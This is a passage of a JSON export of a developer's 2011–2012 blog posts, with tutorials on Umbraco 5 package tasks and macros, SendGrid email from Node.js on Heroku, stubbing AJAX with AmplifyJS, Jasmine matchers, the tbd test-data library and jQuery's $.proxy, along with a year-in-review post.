"https://www.aaron-powell.com/posts/2012-01-25-macros-in-packages/", "date": "Wed, 25 Jan 2012 00:00:00 +0000", "tags": [ "umbaco", "umbraco-5", "umbraco" ], "description": "Wanting to include a Macro in your v5 package, where do you start?", "content": "So you’re working on an Umbraco 5 package and you want to be able to ship your own Macro with it.
Seems like a common scenario you want to do yeah? It’s something that’s possible in v4 right? So how do you go about doing it in v5?\nSome backgroundIn v4 Macros were a bit of a pain to ship, in case you didn’t know they were stored in the database and their data model was… less than ideal mainly as they evolved from being XSLT components to also supporting .NET, Iron* and eventually Razor.\nWell here’s a fun fact about v5 Macros they aren’t in the database, Macros in v5 are actually stored in Hive. Out of the box they will be run of the file system Hive provider but since they are in Hive you could (in theory) stick them into the Database, on a FTP or anywhere crazy that you want. But really, them being on the file system is pretty fantastic as it means that it’s really easy to include them in Source Control, something that was a huge problem with the Umbraco projects I’d worked with in the past.\nYou will find your macros (by default) at the location ~/App_Data/Umbraco/Macros and this contains a serialized XML version of your macro, which looks a lot like the exported Macro definitions in v4, just not quite as confusing. Also this is a configuration value that comes from the /configuration/umbraco/macros[@rootPath] section of the web.config. Again this is something that you can change but you probably shouldn’t :P.\nInstalling Macros from your packageIn my last post I introduced tasks and again this is what you’ll want to use to install your macro with your package.\nThe first thing you want to do is copy your macro file from the Macros folder into somewhere that’ll include it in your package. I use a folder called Macros that sites at the root of my package, but it’s ultimately a personal preference thing so you can put that folder anywhere inside your package.\nSide note Matt Brailsford has a great post on how to create v5 packages, a must-read until there’s a UI to do it.\nPart of the v5 source includes a task that can help you with this and it’s called CopyFileTask and it allows you to copy a single file from one location to another. You’ll see this task used as part of the DevDataset that’s shipping with the RC builds but what you want to do is something like this:\n<add type="Umbraco.Cms.Web.Tasks.CopyFileTask, Umbraco.Cms.Web.Tasks" trigger="post-package-install"> <parameter name="source" value="Macros/MyMacro.macro" /> <parameter name="destination" value="~/App_Data/Umbraco/Macros/MyMacro.macro" /> </add> Adding that to your web.config in your packages (as described in my last post) will copy the file from the Macros folder in your package (or what ever folder you’ve put them into) to the Umbraco Macros folder.\nConclusionYes, that’s it.\nSeriously, it’s so much easier to ship Macros in v5 that v4 and the fact that they are running off disk (don’t be a dick and use some crazy Hive provider for them like Examine!) 
makes installing them as simple as copying a file.\nBut I think there’s some room for improvements around this still and as I work on my v5 tasks set I’m going to be doing a simpler task for installing Macros, but in the meantime the above will work nicely today.\n", "id": "2012-01-25-macros-in-packages" }, { "title": "Creating an installer task", "url": "https://www.aaron-powell.com/posts/2012-01-24-creating-an-installer-task/", "date": "Tue, 24 Jan 2012 00:00:00 +0000", "tags": [ "umbraco", "umbraco-5" ], "description": "A look at the v5 task system, particularly how to create an installer task", "content": "As you possibly know I’m working on an extension for Umbraco 5 called Stats It and I’ve initially been focusing on making the install process nice and smooth for people who want to get up and running with the package. A good install experience will do wonders for giving your project credibility.\nFor this I have had to do a bit of digging into the Task system which is coming in v5, which is acting as a replacement for the traditional .NET event system, and in this article I’m going to share some tips when building installer tasks.\nRight task for the jobIn v5 there are two kinds of tasks available, Standard Tasks (my name) and Configuration Tasks and depending on what you’re wanting to do you’ll need to choose the right kind of task. Here’s a quick overview of the two task types:\nStandard Task This is the most common type of task that you’ll be creating; a task inherits from Umbraco.Cms.Web.Tasks.AbstractWebTask and requires a Umbraco.Framework.Tasks.TaskAttribute to be added so that the Umbraco framework layer will be able to find it (and you need to provide the attribute with a Guid for identification). This task type is very basic and can be used for any task that is raised in the system and then execute a piece of code, because of this you can think of it as being very similar to the event handlers that were in the Umbraco 4 system (or that you’ll find in any .NET application).\nConfiguration Tasks This task is primarily used in the install/ uninstall process of Umbraco 5 and inherits from Umbraco.Cms.Web.Tasks.ConfigurationTask. Where the previous task type you require an attribute the Configuration Tasks don’t and you’ll get some very undesired results if you do include the attribute. The power of this task type though is it allows you to specify values in the configuration file for the task, providing static values into the task as it is executed.\nSide note - there is another task type Umbraco.Framework.Tasks.AbstractTask which is the base class for the AbstractWebTask but instead of relying on the web-side of Umbraco 5 it can be run without any web references. This would what you want if you are using the Umbraco framework outside of a web context, which it can do in-theory, but it’s well beyond the scope of this post :P.\nTask configurationIn addition to creating a class you’ll also need to add a section in your configuration file that your task definition will reside within. There are two ways to do this:\nAdd to the master web.config file (not recommended as it can have upgrade issues) Add your own package I’m going to make the assumption that you’re creating your own package here and you’ll have your own web.config that you want to work against. 
First off you need to ensure you have the right web.config section:\n<configuration> <configSections> <sectionGroup name="umbraco.cms"> <section name="tasks" type="Umbraco.Cms.Web.Configuration.Tasks.TasksConfiguration, Umbraco.Cms.Web" requirePermission="false" /> </sectionGroup> </configSections> </configuration> This is the basis of your web.config file (and assuming there’s nothing else in it yet) and what we’ve done is created a new web.config section called umbraco.cms and in that included the tasks section which uses a type provided by Umbraco.\nNext we need to register our tasks:\n<umbraco.cms> <tasks> <add type="MyPackages.Tasks.MyAwesomeTask, MyPackage" trigger="post-package-install" /> </tasks> </umbraco.cms> This section would appear after the </configSections> node and adds the section which we defined and then within that we add our tasks. There are two pieces of information we have to provide it:\nThe fully qualified type of our task (namespace + classname + assembly) A trigger for the task, for install tasks there is one called post-package-install So that’s the setup, now to make a task.\nCreating your first taskSo you’re working on the next awesome package for Umbraco 5 and you need some stuff to happen when you install your package, well let’s get cracking and make your first task. We’ll do a basic task which will email you on package install, kind of a basic pingback to tell you when someone has installed the package. First up we’ll make a class:\nusing System; using Umbraco.Cms.Web.Context; using Umbraco.Cms.Web.Tasks; using Umbraco.Framework; using Umbraco.Framework.Tasks; namespace TaskDemo { [Task("{C1C251E1-CACF-447A-9516-694251C16B08}", TaskTriggers.PostPackageInstall)] public class EmailOnInstall : AbstractWebTask { public EmailOnInstall(IUmbracoApplicationContext applicationContext) : base(applicationContext) { } public override void Execute(TaskExecutionContext context) { throw new NotImplementedException(); } } } This is as empty a file as you can possibly have for an Umbraco 5 task, currently this will just error on install, pretty useful!\nThe important stuff will be happening within the Execute method, this is the method that is invoked when task is run and obviously where you want to put your logic, so let’s build it out:\npublic override void Execute(TaskExecutionContext context) { var email = new MailMessage { From = new MailAddress("phone-home@demo.com") }; email.To.Add(new MailAddress("new-install@demo.com")); email.Subject = "A new install has happened!"; email.Body = "Hey dude,\\r\\nSomeone has installed your awesome package!\\r\\nH5YR!"; var smtpClient = new SmtpClient(); //server config skipped smtpClient.Send(email); } There we go, a very basic implementation of a task has been done! 
Here’s the config for this:\n<?xml version="1.0" encoding="utf-8" ?> <configuration> <configSections> <sectionGroup name="umbraco.cms"> <section name="tasks" type="Umbraco.Cms.Web.Configuration.Tasks.TasksConfiguration, Umbraco.Cms.Web" requirePermission="false" /> </sectionGroup> </configSections> <umbraco.cms> <tasks> <add type="TaskDemo.EmailOnInstall, TaskDemo" trigger="post-package-install" /> </tasks> </umbraco.cms> </configuration> Something you may notice is that in my config and in my class I’ve had to specify the trigger, this could be a mistake that I’ve made in my understanding thus-far but it seems to me that that is needed, someone feel free to correct me ;).\nCreating a configuration taskAs stipulated the above task is very basic but it does show you how you can work with the basics of a task. Well let’s say that you want to create something a bit more advanced, say you want to have a task that will grant permissions to your custom application when the package is installed (this is a common problem solved in the PackageActionContrib in v4). For this we’ll leverage the Configuration Task type so that we can make it a reusable task.\nusing System; using Umbraco.Cms.Web.Context; using Umbraco.Cms.Web.Tasks; using Umbraco.Framework.Tasks; namespace TaskDemo { public class GrantPermissions : ConfigurationTask { public GrantPermissions(ConfigurationTaskContext configurationTaskContext) : base(configurationTaskContext) { } public override void Execute(TaskExecutionContext context) { throw new NotImplementedException(); } } } So again we’ve got our skeleton class but this time we inherit from ConfigurationTask so that we can provide it with configuration values.\nInside the Execute method we can access the ConfigurationTaskContext.Parameters property which will contain the parameters that are passed in from our configuration file, like so:\npublic override void Execute(TaskExecutionContext context) { if (!ConfigurationTaskContext.Parameters.ContainsKey("application")) throw new ArgumentException("No application supplied"); } A simple check to make sure that we did get an application supplied, I want that as a pre-condition so that people don’t break things on me!\nBut let’s do something with the application provided:\nNote: We’re diving into the Hive here, I’m going to glance over how Hive works here, that’s beyond the scope of this article, just believe me when I say that the code does work :P\npublic override void Execute(TaskExecutionContext context) { if (!ConfigurationTaskContext.Parameters.ContainsKey("application")) throw new ArgumentException("No application supplied"); var controller = (Controller)context.EventSource; //Get the ID of the current user var id = ((UmbracoBackOfficeIdentity)controller.User.Identity).Id; //Access the Hive user store using (var uow = ApplicationContext.Hive.OpenWriter<ISecurityStore>()) { //find the current user in Hive var entity = uow.Repositories.Get<User>(id); //Add the specified app to their permissions var apps = new List<string>(entity.Applications) { ConfigurationTaskContext.Parameters["application"] }; //Update their permissions entity.Applications = apps; //Tell Hive to update the object -- possibly not needed uow.Repositories.AddOrUpdate(entity); //tell Hive that we want to save the changes to its store uow.Complete(); controller.HttpContext.CreateUmbracoAuthTicket(entity); } } I’ve put some comments inline to explain the code as it goes but the important part is that we are reading the task parameters out and adding it to the users 
permissions.\nOnce this is all updated it amazingly will just give a new icon in the applications tray on the install of the package!\nNow let’s have a look at the config:\n<tasks> <add type="TaskDemo.GrantPermissions, TaskDemo" trigger="post-package-install"> <parameter name="application" value="my-awesome-app" /> </add> </tasks> ConclusionWhile the code above may look a little bit scare to begin with it’s actually not that bad when it comes to creating tasks. There’s a few simple rules which you need to remember:\nPick the right type of task for your work, do you want to pass in config values or can you compile everything together? Do you need to work with anything web specific or is just the base FrameworkContext going to be enough? Make sure you subscribe to the right event! There’s a few tasks built into the core of Umbraco 5 for copying files so that can also provide a good reference source.\n", "id": "2012-01-24-creating-an-installer-task" }, { "title": "Heroku, SendGrid and NodeJS", "url": "https://www.aaron-powell.com/posts/2012-01-05-heroku-sendgrid-nodejs/", "date": "Thu, 05 Jan 2012 00:00:00 +0000", "tags": [ "nodejs", "heroku" ], "description": "A quick guide to sending emails from nodejs on Heroku using SendGrid", "content": "Last night I launched the registration site for Stats It, and Umbraco 5 add-on I’m working on and I wanted to get the site out quickly and well… cheaply so I decided that I’d just do a 1 page site in NodeJS.\nFor hosting I wanted to go with Heroku as I just love how simply I can get a site from my local machine to deployed with the platform and I also love how many add-ons there are available.\nTo send emails there’s a couple of choices, I decided to go with SendGrid for no reason other than they were the first that I saw :P.\nSo install SendGrid into your heroku app (I’m using the free version):\nheroku addons:add sendgrid:starter And now you need something to send emails from NodeJS, for this I’ve gone with node_mailer as it was the first in my search results and it’s got a dead simple API. What’s really cool about Heroku is that when you have add-ons such as SendGrid installed you get the config options injected, meaning sending an email is as simple as this:\nvar email = require('mailer'); email.send({ host: 'smtp.sendgrid.net', port: '587', authentication: 'plain', username: process.env.SENDGRID_USERNAME, password: process.env.SENDGRID_PASSWORD, domain: 'heroku.com', to: 'someone@somewhere.com', from: 'someone@somewhere-else.com', subject: 'You sent an email', body: 'Hey look at that!' }, function (err, result) { //Do your error handling }); You have to hard-code these settings:\nhost: 'smtp.sendgrid.net' port: '587' authentication: 'plain' But Heroku will inject the username & password for you, both of which will be on the process.env object, like so:\nprocess.env.SENDGRID_USERNAME process.env.SENDGRID_PASSWORD And there you have it, you’re not ready to send emails from NodeJS on Heroku.\n", "id": "2012-01-05-heroku-sendgrid-nodejs" }, { "title": "Stubbing AJAX responses with tbd and AmpliyJS", "url": "https://www.aaron-powell.com/posts/2011-12-29-stubbing-ajax-responses-with-tbd/", "date": "Thu, 29 Dec 2011 00:00:00 +0000", "tags": [ "javascript", "amplifyjs" ], "description": "Working with tbd to build your requests without backend services", "content": "A project which I’m working on at the moment I’m using AmplifyJS to simplify my front-end routing through to my underlying data service calls. 
The problem is that I haven’t got the backend services ready yet (there’s some outstanding blockers in the API I’m working against) so I’m focusing my work on the front end.\nBut there’s the obvious problem, I want to push data to the UI but I don’t have any way to get the data.\nLuckily I wrote tbd recently which can solve one of the problems, it can generate data to pump into my new UI and this is where AmplifyJS really comes to shine.\nIntroduction to faking data with amplify.requestTo simplify my front-end routing I’m going to be using the Request API from AmplifyJS and if you’re not familiar with it check out the docs before going further as I only plan to cover the testing side of it.\nLet’s say I have a route defined like so:\namplify.request.define('get-data', 'ajax', { url: '/data-service', dataType: 'json', type: 'GET' }); And later in my app I’m accessing it:\namplify.request('get-data', function (data) { //using templating pump out the UI from the data }); So where does the faking data come in? Well the cool thing about how Amplify is designed means that you can replace a defined request!\nSay what?!\nFirst thing we need to understand is the request types. When you define your request in AmplifyJS the 2nd argument you pass in is the request type, generally speaking this will be ajax as that is the provided request type in the API. You can define your own types so if you were wanting to pull in from an OData service you can setup that, add a new key to the request types and then it’s all sweet (sorry how to do that is beyond this articles scope).\nWhere it gets really interesting is that if your provide only two arguments to the define method, a key and a function this works as well. In this case your function is executed when you invoke the request. Now let’s add this code:\namplify.request.define('my-data', function (settings) { settings.success({ status: 'success', items: { } }); }); This will make it so that whenever I call my request I will get a successful response with no data. There are properties which you need to set, first is the status to success so that AmplifyJS knows the response was successful, second is the items property which will contain any data you want returned to the method.\nSetting up your project Now you’ve got the basics down I thought I’d just give a bit of an insight into how I go about including this into a project. As mentioned you can override a defined request as many times as you want:\namplify.request.define('my-data', 'ajax', { ... }); amplify.request.define('my-data', 'odata', { ... }); amplify.request.define('my-data', function (settings) { ... }); Here I’ve setup the request three times but the last one to be executed is the one included.\nThe way I setup my project is that I have a file which I define my requests in, all of them together (or at least logically broken down into groups of common requests). For when I’m wanting to stub out my requests I create a secondary file and include the stubbed out requests in there and then include it directly after the main file. This means that once the real request is created it’s immediately replaced with fake out.\nWith the fake requests in a separate file I can include or exclude them as I please, as my services come online or even use them in unit tests.\nBuilding your dataThe idea of doing this all with AmplifyJS was shown to me by Elijah Manor. 
He sent me this jsfiddle which shows it all set up.\nThe problem with examples like this is that they are using fixed data: every reload of that page will show you exactly the same thing, and clicking the refresh button on the UI will reload the data with exactly the same data. Now in this demo it’s not really that big a deal, the data doesn’t really need to look different each time so it’s not going to make much difference. But what if you are doing something that will look different based on the data, say you’re doing some charting?\nI’ve created a jsfiddle to demonstrate this, when you click the button the chart will be rebuilt with different data.\nNow here’s my mock request:\namplify.request.define('get-data', function (settings) { var data = tbd.from({}) .prop('category').use(tbd.utils.random('a', 'b', 'c', 'd', 'e')).done() .prop('value').use(tbd.utils.range(10, 100)).done() .make(tbd.utils.range(3, 8)()); settings.success({ status: 'success', items: data }); }); With tbd I’m scaffolding out a data series for my charting API, using the alphabet as the label and then a randomly chosen number between 10 and 100 for the value. This means that as I generate new data my UI will change (I’m leveraging one of tbd’s util methods to generate a random number of results as well; I might clean up the API to make that simpler in the future).\nConclusionAnd there we have it, an example of how we can combine a couple of helpful JavaScript libraries to make it easier to:\nSimplify our UI request layer\nMake sure our development isn’t halted while data services are under development\nHave less hard-coded data responses\n", "id": "2011-12-29-stubbing-ajax-responses-with-tbd" }, { "title": "Some useful Jasmine extensions", "url": "https://www.aaron-powell.com/posts/2011-12-23-useful-jasmine-extensions/", "date": "Fri, 23 Dec 2011 00:00:00 +0000", "tags": [ "javascript", "jasmine", "testing" ], "description": "A few useful matcher helpers for Jasmine", "content": "For tbd, a JavaScript helper I’ve written, I’ve been using Jasmine for my testing.\nFor some of the tests I’ve had to go beyond the matchers available out of the box, so I thought I’d share them here (mostly so I’ve got an easy point for myself to find them again :P).\nA quick intro to adding your own matcherIf you’re new to Jasmine and haven’t added your own matchers, here’s a quick tutorial.\nYou need to use beforeEach and call addMatchers, like so:\nbeforeEach(function() { this.addMatchers({ alwaysTrue: function(){ //put your logic in here to determine truthy results return true; } }); }); Now you can call it like so:\nexpect('something').alwaysTrue(); This example matcher isn’t really useful as it will always return true, but you can put in any logic you want.\nThe this object has an actual property, which is the value from your expect method, and the arguments passed to the call are passed in.\nMy matchersbeforeEach(function() { this.addMatchers({ toBeInArray: function() { return ~[].slice.call(arguments).indexOf(this.actual); }, toBeInDateRange: function(min, max) { var actual = this.actual.getTime(); return actual <= max.getTime() && actual >= min.getTime(); }, toBeInNumericalRange: function (min, max) { var actual = this.actual; return actual <= max && actual >= min; } }); }); Here’s how you use them:\nexpect('a').toBeInArray('a', 'b', 'c'); expect(3).toBeInNumericalRange(0, 10); expect(new Date(2011, 11, 01)).toBeInDateRange(new Date(2011, 10, 01), new Date(2011, 11, 30)); Hopefully this is helpful to someone else :)\n",
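To show one of these matchers in a complete (if contrived) spec, here's a minimal sketch assuming the Jasmine 1.x style used above (where addMatchers hangs off this inside beforeEach) and reusing tbd from the earlier posts:

```javascript
describe('tbd value generation', function () {
    beforeEach(function () {
        this.addMatchers({
            toBeInNumericalRange: function (min, max) {
                return this.actual >= min && this.actual <= max;
            }
        });
    });

    it('keeps generated values inside the requested range', function () {
        var data = tbd.from({ value: 0 })
            .prop('value').use(tbd.utils.range(10, 100)).done()
            .make(5);

        for (var i = 0; i < data.length; i++) {
            expect(data[i].value).toBeInNumericalRange(10, 100);
        }
    });
});
```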
"id": "2011-12-23-useful-jasmine-extensions" }, { "title": "2011, a year in review", "url": "https://www.aaron-powell.com/posts/2011-12-22-2011-a-year-in-review/", "date": "Thu, 22 Dec 2011 00:00:00 +0000", "tags": [ "year-review" ], "description": "", "content": "As the year wraps up it brings time for the atypical year in review post!\nWhile last year I declared to be the year of the conferences but of course this year was just as crazy with conferences.\nI…\nGot a Microsoft MVP award! Went to the USA for my first time to go to MIX11 and talked FunnelWeb at the Open Source Fest Vegas is insane and I don’t think I’ve ever been as hung over in my life as I’d been Hanging out with Glenn Block was heaps of fun, he’s such a top guy I got to have lunch with Scott Hanselman, Phil Haack and Rob Conery which was pretty awesome from a nerd point of view The pre-party also allowed me to meet some of my idols in Douglas Crockford, Dave Ward and Elijah Manor Next stop was Melbourne and DDD Melbourne where I got to present on JavaScript craziness And watching Steve Godbold rap was just hilarious Next up was REMIX where I spoke on being a web developer and had to do an impromptu session where I talked about JavaScript again (although admittedly I lost the audience on the second talk :P) It wasn’t long until I was back on a plane to get to Denmark for CodeGarden 11 where I talked about everything from ASP.NET MVC to what is interesting in Umbraco 5 I have since been removed from the Umbraco project but I stand by what got me removed, instead I am trying to get people involved from the outside Back in Australia and it was time for DDD Sydney and a revisit my DDD Melbourne talk about getting freaky with JavaScript and talk about Open Source in the panel session run by Nick Hodge But no rest for wicked it was time for Teched NZ (slides) and then Teched AU (slides & video) I got voted one of the top sessions in the web track which was pretty exciting! Phew!\nFor the first time in 2 years though I didn’t resign from my job, I know, shockingly I’m still working at the same company I was working for this time last year.\nGenerally speaking I’ve scaled back my Open Source work, I’ve still tried to be active in the various communities but instead of actively developing I’ve tried to be more of a voice of reason. I’ve release a few small things such as:\nAnother pub/sub library in JavaScript A JavaScript quiz website Which I then rewrite in NodeJS But admittedly it’s not been getting a lot of love these days from myself or the community A library to building test data in JavaScript So here’s to a more JavaScript filled 2012!\n", "id": "2011-12-22-2011-a-year-in-review" }, { "title": "I want you", "url": "https://www.aaron-powell.com/posts/2011-12-19-i-want-you/", "date": "Mon, 19 Dec 2011 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": "\nHi, my name’s Aaron and I’m a former member of the Umbraco core team. Before I departed the core team something I was pushing for was greater involvement between the core (and HQ) and the Umbraco developer community.\nLet me make sure I clear one thing up first, Umbraco has a great user community, our.umbraco thrives with huge number of contributors helping everyone out from the beginner to the advanced. 
The extensions community is also a hive (sic) of activity.\nThe community that I’m talking about is the one around developing Umbraco as a product.\nIf you’re reading this you most likely have some vested interest in Umbraco, you’re doing freelancing and implementing it, your company sells solutions based around it or you are like me and just find CMSs sexy (well let’s hope that’s not the case :P). Whatever the case may be the direction of the product does have an impact on you so you should make sure your voice is heard. Even if you’re not a developer your voice is important, feedback about things you/ your clients find challenging, features you’d like to see, testing alpha/ beta/ RC released or even just questioning why something was done a particular way.\nHow do I get involved? This all sounds well and good but what should you do?\nA few months ago the Umbraco 5 contrib was opened up and it’s already starting to get some stuff around this up there.\nThere’s a post on contributing and then there’s the discussion around automated UI testing which Matt Braildsford took into a larger discussion last week.\nLastly there’s a room on JabbR but it’s a little quiet still these days.\nKeep an eye on the Umbraco twitter stream and grab nightly Umbraco builds.\nRaise a discussion if you don’t understand why something was implemented some way (but keep implementation discussions to our.umbraco).\nMonitor change set commits and make sure they are still conforming to what standards there are.\nSo c’mon, get involved!", "id": "2011-12-19-i-want-you" }, { "title": "Building data with tbd", "url": "https://www.aaron-powell.com/posts/2011-12-12-building-data-with-tbd/", "date": "Mon, 12 Dec 2011 00:00:00 +0000", "tags": [ "javascript", "nodejs" ], "description": "An introduction to tbd, a data generator for JavaScript", "content": "When building a UI that is driven by JavaScript one of the most tedious tasks is ensuring that you have data which you can populate into the UI to develop against. If you’re like me you probably prefer to do the UI component before the server component. Alternatively you could be working in a team where someone else is responsible for developing the server component at the same time as you’re developing the UI. Which ever the case is you’ll find yourself in a situation where you don’t have the data to build out your UI.\nThis is a situation that I find myself in quite often and it always left me thinking about how I would throw together some data to do the UI. Generally speaking it’d involve a bunch of copy and pasted lines of JavaScript which builds up an object graph. This does work but it’s not a great way to simulate data, especially if you want to change the data volumes and see how the UI will react.\nComing from a .NET background I’ve used libraries like NBuilder and Fabricator in the past. These libraries take an input object and will generate a series of fake data from it.\nSo I thought “hey, why not create that in JavaScript” and from there tbd was born!\ntbd - Test Data Buildertbd, or Test Data Builder is a project I started to create (fake) data using JavaScript. There’s a bit of a joke in the name, when I was trying to pick a name I was thinking “what’d be quirky, it’s for building test data, oh sweet, tbd since it can be Test Data Builder or To Be Defined, which makes for a good play on words”. 
Now the astute reader will notice the mistake immediately but for those with reading problems like me you’ll need a hint, Test Data Builder is actually tdb.\nThe idea behind tbd was to be able to take a JavaScript object and create a bunch more of them, as many as you want! I also wanted it to be disconnected to the browser so you could run it in both Node.js and the browser. For running it in the browser you need to add a reference to the file and with Node.js it’s up on npm.\nHere’s a basic example of how to use it:\nvar data = tbd.from({ hello: 'world' }).make(10); This will create an array of 10 objects all which are identical. Since JavaScript doesn’t have reflection like .NET there isn’t a way to get an inferred type of a property, instead you have to assign it a ‘default’ value. This can have an advantage though as it means you can also only have tbd generate values for properties you actually want random data for. So how do you do values?\nvar data = tbd.from({ foo: 1 }) .prop('foo').use(function() { return Math.random(); }).done() .make(10); This will create an array of 10 items which have a unique random number (well as unique as a random number can be :P) for the property foo. To break down the way it works you need to understand the fluent API for properties.\nPass the property name to the prop method as a string Pro tip - if the property name doesn’t exist on the source object it’ll still be added! Pass a value or function into the use method If you pass a value that will be used for each object If you pass a function it’ll be invoked for each object There’s some helper methods we’ll look at later Call done to signify you’ve finished with that property so you’re back to the root API and allow you to modify more properties The last thing you always call is make and specify the number of objects you want.\nAnd that’s it, you can go off and create all the data you could ever want.\nMaking better fake dataSince tbd is a really dumb API if you don’t tell it what to do with a property it wont do anything. So how do you produce better fake data? That might sound like a silly question but say you’re trying to build some graphs, you don’t want all the data to be the same do you?\nWell to simplify this tbd ships with a number of useful utilities for generating better fake data. The full list you can get off the readme but are some of the most useful IMO. All of these reside in the tbd.utils namespace.\nPick a random value Say you want to randomly choose a value from a set of values, say a bunch of different word, there’s a handy method that’ll do that called random and you use it like so:\nvar data = tbd.from({ hello: 'world' }) .prop('hello').use(tbd.utils.random('me', 'no me', 'why not me!')).done() .make(10); This method takes n number of arguments and it will randomly choose one of them for each object. You can pass in any data type that you want to this and it’ll take a random from the list so you’re not just restricted to strings.\nBetter random numbers and dates While the random method is great if you have a small set of data to go through but what if you don’t? What if you want a random number between 1 and 1000? Typing that out would suck. Well luckily there is the range method:\nvar data = tbd.from({ hello: 'world' }) .prop('hello').use(tbd.utils.range(1, 1000)).done() .make(10); For range you pass in a min and max value and something from in there will be used. 
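For example, here's a small sketch of using range to generate ages (the property names are purely illustrative):

```javascript
// 25 objects, each keeping name: 'Aaron' but getting a random age between 18 and 65
var people = tbd.from({ name: 'Aaron', age: 0 })
    .prop('age').use(tbd.utils.range(18, 65)).done()
    .make(25);
```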
This method also supports dates so you can randomly choose a date from within a range.\nSequences Sometimes you just want an ordered list of values and that’s where sequential comes in. Sequential you provide a start point and you’ll get a value incremented by one each time from there:\nvar data = tbd.from({ hello: 'world' }) .prop('hello').use(tbd.utils.sequential(1)).done() .make(10); Note: I had a mistake in the initial post, the method is sequential not sequence.\nDate sequences One cool thing about the sequential api is that you can provide it a date and it will increment that. By default the dates will shift one day at a time to get you to your new date:\ntbd.from({ date: new Date }) .prop('foo').use(tbd.utils.sequential(new Date() /* optional parameter for date property the increment, default is 'd' */) .make(10); //the 'day' property will be incremented by 1 from the starting value But you can overload this to increment by other date parts:\ny -> Year M -> Month d -> Day (default) h -> Hour m -> Minutes s -> Seconds ConclusionSo this wraps up our look at tbd, a useful little tool I wrote to make it easier to build out some fake data for when you’re mocking a UI or to pump into a test.\nGrab it today!\n", "id": "2011-12-12-building-data-with-tbd" }, { "title": "You don't need to use $.proxy", "url": "https://www.aaron-powell.com/posts/2011-12-12-you-dont-need-jquery-proxy/", "date": "Mon, 12 Dec 2011 00:00:00 +0000", "tags": [ "jquery", "javascript" ], "description": "Why you shouldn't use (and don't need to use) the $.proxy method in jQuery", "content": "I’ve been recently going through some extending of a jQuery UI widget which a colleague had written when I came across quite a number of statements that were using the proxy method from jQuery.\nFor anyone who’s not familiar with the proxy method is allows you to take a function and specify a context (the this value) so when you pass it around for execution you always know what you’re going to have as the context.\nThe method has been around for a while and it did serve a good purpose but these days its usefulness is becoming limited and I’m going to look at a few reasons as to why you shouldn’t be using it.\nUnderstand thisThe most common reason I see that people will use proxy is because they don’t understand how this works in JavaScript. While there are dozens of articles through your favourite search engine explaining this (here’s a good start) I’ll do my best to give a quick overview.\nWhen people come from C# they already have a notion of this and what it represents, unfortunately this is a broken assumption when moving to JavaScript. In C# this represents the current class which you’re working within but since JavaScript isn’t a classical language there isn’t the concept of a class so you couldn’t really associate it to one could you?\nInstead this represents the context for which a function is executed for and different kinds of execution result in different contexts. Here’s a few examples:\nInvoking a function from an object will set the context to the owner object Invoking a function literal will set the context to the global object (window in a browser) Invoking a function with apply/ call allows it to be controlled And this is why a lot of people get utterly confused with this in JavaScript.\nBut what does this have to do with the $.proxy method? 
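Before answering that, here's a quick sketch that makes the three cases above concrete (the object and names are just for illustration, run loosely in a browser's global scope, non-strict):

```javascript
var obj = {
    name: 'foo',
    whoAmI: function () { return this.name; }
};

obj.whoAmI();             // 'foo' - invoked from the object, so this is obj

var fn = obj.whoAmI;
fn();                     // '' (window.name) - invoked as a plain function, this is the global object

fn.call({ name: 'bar' }); // 'bar' - call/apply let you pick the context explicitly
```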
As I said one of the most common reasons I see people using it is because they want to be able to access members of a particular object within a callback (such as a function called from an AJAX success). Because they are aware that in their outer function they can go this.foo they expect it to be available within the callback (after all isn’t the callback in the same class?) but it will fail so they use $.proxy to ensure that they can access the member(s) they require.\nSo why is it a poor choice in this scenario? Well the reason is that you can solve the problem in a much simpler fashion, by understanding JavaScript closures. You can draw a lot of similarities between JavaScript closures and C# closures, but the simplest explanation is that a variable with be within scope until all functions that require is have been descoped. But with the case of this, since it changes between function scopes the var that = this pattern emerged in JavaScript.\nLet’s have a look at some code:\nvar foo = { makeRequest: function () { $.get('/foo', $.proxy(function (result) { this.update(result); }, this) ); }, update: function (data) { /* ... */ } }; //somewhere later in the code foo.makeRequest(); Here we’re using the proxy method to make it possible to access the update method, since when we called the makeRequest method its this is a reference to foo (we’re assuming that the assignment of foo is out of scope for the makeRequest method). So let’s update it to use variable closures:\nvar foo = { makeRequest: function () { var that = this; $.get('/foo',function (result) { that.update(result); }); }, update: function (data) { /* ... */ } }; foo.makeRequest(); The difference here is that I’m assigning the value of this to a variable before the callback is created and inside the callback I refer back to the variable.\nSo why is this better than using proxy? The primary reason is readability, if you look at the first snippet you’re intention is obscured by the use of proxy to change the scope. When someone who understands JavaScript comes to that snippet they have to know what the use of proxy is and why the this context needs to be controlled. With the second snippet it’s clearer to see that you want to call the update method on the same object which makeRequest was invoked from.\nUse built-in methodsAn often missed note of JavaScript (well ECMAScript really) is that the functionality that is provided by proxy (and the similar methods in the other libraries) is built into the language, through the bind method. The bind method was added as part of ECMAScript 5 and\nCreates a new function that, when called, itself calls this function in the context of the provided this value, with a given sequence of arguments preceding any provided when the new function was called.\nHmm that sounds pretty much like what you get from the proxy method yet it’s built into the language.\nThis means that you can (potentially) get a performance boost (check it out on JSPerf) by using a native browser API rather than the wrapper. Also at the time of writing jQuery (1.7.1) doesn’t use the native browser method it does the code itself.\nPerformance aside the main difference between the jQuery implementation and the ECMASCript 5 specification is the jQuery proxy method does not throw a type error if the first argument is not a function which the spec states bind will do. 
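For completeness, here's the earlier makeRequest example rewritten against the native method - the same shape as the $.proxy version, just without the wrapper:

```javascript
var foo = {
    makeRequest: function () {
        // bind fixes the callback's this to the object makeRequest was invoked on
        $.get('/foo', function (result) {
            this.update(result);
        }.bind(this));
    },
    update: function (data) { /* ... */ }
};

foo.makeRequest();
```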
So although they are named differently they are providing the same functionality except for a critical check.\nThe take away from this point is that it’s built into the language so using it makes a lot of sense and when you’re in browsers that don’t support it it’s easy to polyfil the missing API (the mdn docs include the polyfil).\nConclusionThat wraps up my “rant” against using the proxy method in jQuery. The goal of this article was to teach you a bit more about the JavaScript language and that things people commonly try and work around have simpler solutions.\nBy understanding language concepts such as this and closures you can avoid manipulating scope.\nBy knowing what’s new in the language you can use built-in APIs and make faster and more portable code.\n", "id": "2011-12-12-you-dont-need-jquery-proxy" }, { "title": "Xamlizer - How to implement something silly in JavaScript", "url": "https://www.aaron-powell.com/posts/2011-10-24-xamlizer-implementing-something-silly-in-javascript/", "date": "Mon, 24 Oct 2011 00:00:00 +0000", "tags": [ "javascript", "doing-it-wrong" ], "description": "", "content": "I’ve never done much Xaml development, I started reading a WPF book and played around with it only to realise I didn’t have any understanding of this concept of a stateful application or how layouts were going to work. And as a web developer who never saw the 